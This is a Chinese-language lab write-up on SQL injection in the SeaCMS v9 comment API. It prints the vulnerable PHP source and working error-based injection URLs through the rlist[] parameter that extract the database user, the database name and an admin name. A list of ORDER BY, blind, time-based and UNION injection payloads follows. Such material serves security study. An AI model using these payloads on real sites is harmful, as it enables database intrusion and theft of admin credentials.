seacmsv9联合注入数据以及绕过 ORDERBY

seacmsv9联合注入数据

php源码

<?php
session_start();
require_once("../../include/common.php");
$id = (isset($gid) && is_numeric($gid)) ? $gid : 0;
$page = (isset($page) && is_numeric($page)) ? $page : 1;
$type = (isset($type) && is_numeric($type)) ? $type : 1;
$pCount = 0;
$jsoncachefile = sea_DATA."/cache/review/$type/$id.js";
//缓存第一页的评论
if($page<2)
{if(file_exists($jsoncachefile)){$json=LoadFile($jsoncachefile);die($json);}
}
$h = ReadData($id,$page);
$rlist = array();
if($page<2)
{createTextFile($h,$jsoncachefile);
}
die($h);	function ReadData($id,$page)
{global $type,$pCount,$rlist;$ret = array("","",$page,0,10,$type,$id);if($id>0){$ret[0] = Readmlist($id,$page,$ret[4]);$ret[3] = $pCount;$x = implode(',',$rlist);if(!empty($x)){$ret[1] = Readrlist($x,1,10000);}}	$readData = FormatJson($ret);return $readData;
}function Readmlist($id,$page,$size)
{global $dsql,$type,$pCount,$rlist;$ml=array();if($id>0){$sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";$rs = $dsql ->GetOne($sqlCount);$pCount = ceil($rs['dd']/$size);$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page-1)*$size.",$size ";$dsql->setQuery($sql);$dsql->Execute('commentmlist');while($row=$dsql->GetArray('commentmlist')){$row['reply'].=ReadReplyID($id,$row['reply'],$rlist);$ml[]="{\"cmid\":".$row['id'].",\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".date("Y/n/j H:i:s",$row['dtime'])."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";}}$readmlist=join($ml,",");return $readmlist;
}function Readrlist($ids,$page,$size)
{global $dsql,$type;$rl=array();$sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";$dsql->setQuery($sql);$dsql->Execute('commentrlist');while($row=$dsql->GetArray('commentrlist')){$rl[]="\"".$row['id']."\":{\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".$row['dtime']."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";}$readrlist=join($rl,",");return $readrlist;
}function ReadReplyID($gid,$cmid,&$rlist)
{global $dsql;if($cmid>0){if(!in_array($cmid,$rlist))$rlist[]=$cmid;$row = $dsql->GetOne("SELECT reply FROM sea_comment WHERE id=$cmid limit 0,1");if(is_array($row)){$ReplyID = ",".$row['reply'].ReadReplyID($gid,$row['reply'],$rlist);}else{$ReplyID = "";}}else{$ReplyID = "";}return $ReplyID;
}function FormatJson($json)
{$x = "{\"mlist\":[%0%],\"rlist\":{%1%},\"page\":{\"page\":%2%,\"count\":%3%,\"size\":%4%,\"type\":%5%,\"id\":%6%}}";for($i=6;$i>=0;$i--){$x=str_replace("%".$i."%",$json[$i],$x);}$formatJson = jsonescape($x);return $formatJson;
}function jsonescape($txt)
{$jsonescape=str_replace(chr(13),"",str_replace(chr(10),"",json_decode(str_replace("%u","\u",json_encode("".$txt)))));return $jsonescape;
}

由源码分析的

用户提交的 rlist[] 参数被拼接到 $x 变量。

$x 传递给 Readrlist 函数构建SQL语句的 IN 子句。

攻击者可通过构造恶意 rlist[] 参数注入SQL代码。

我们进行sql语句构造报错注入出user

http://127.0.0.1/upload9.1/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20user()))),@`%27`

• gid=1：内容ID（数值型参数）。
• page=2：分页参数。
• extractvalue()：MySQL XML处理函数，用于触发错误。
• concat_ws()：用分隔符连接字符串，0x20是空格，0x5c是反斜杠\。
• select user()：获取当前数据库用户。

• 攻击者访问构造的URL，服务器处理rlist[]参数。
• 后端代码将rlist[]值拼接到IN子句：
• 执行时因非法XPath语法报错，错误信息包含数据库用户

• 发现成功进行报错注入

进行数据库名的报错注入

http://127.0.0.1/upload9.1/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,database())),@`%27`

获取数据库名成功

进行获取管理员的第一个用户时

http://127.0.0.1/upload9.1/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(name)from%20sea_admin))),@`%27`

获取密码时

http://127.0.0.1/upload9.1/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(name)from%20sea_admin))),@`%27`

发现再进行管理员的用户信息以及密码时没有回显均为

注入失败

绕过 ORDERBY 

一、通过正则表达式逐字符匹配数据。

ORDER BY (SELECT table_name FROM information_schema.tables LIMIT 1) REGEXP '^a'

若按 1 排序，说明表名以 a 开头。

二、通过 ASCII 码精准推断字符。

ORDER BY ASCII(SUBSTR((SELECT table_name FROM information_schema.tables LIMIT 1),1,1))=97

若按 1 排序，首字母 ASCII 码为 97（即 a）

三、使用 GROUP BY 和 HAVING

通过分组条件泄露数据

GROUP BY (SELECT table_name FROM information_schema.tables LIMIT 1) HAVING 1=1

若分组成功，说明子查询返回有效数据。

四、布尔盲注

通过 IF 函数构造条件分支。

ORDER BY IF((SELECT SUBSTR(table_name,1,1) FROM information_schema.tables LIMIT 1)='a',1,2)

• 按 1 排序则首字母为 a，否则按 2。

五、时间盲注

结合 SLEEP 函数触发延迟。

ORDER BY IF((SELECT user()='root@localhost'), SLEEP(5), 1)

六、通过联合查询直接回显数据。

1' UNION SELECT 1,2,(SELECT table_name FROM information_schema.tables LIMIT 1) -- 

在页面中直接显示表名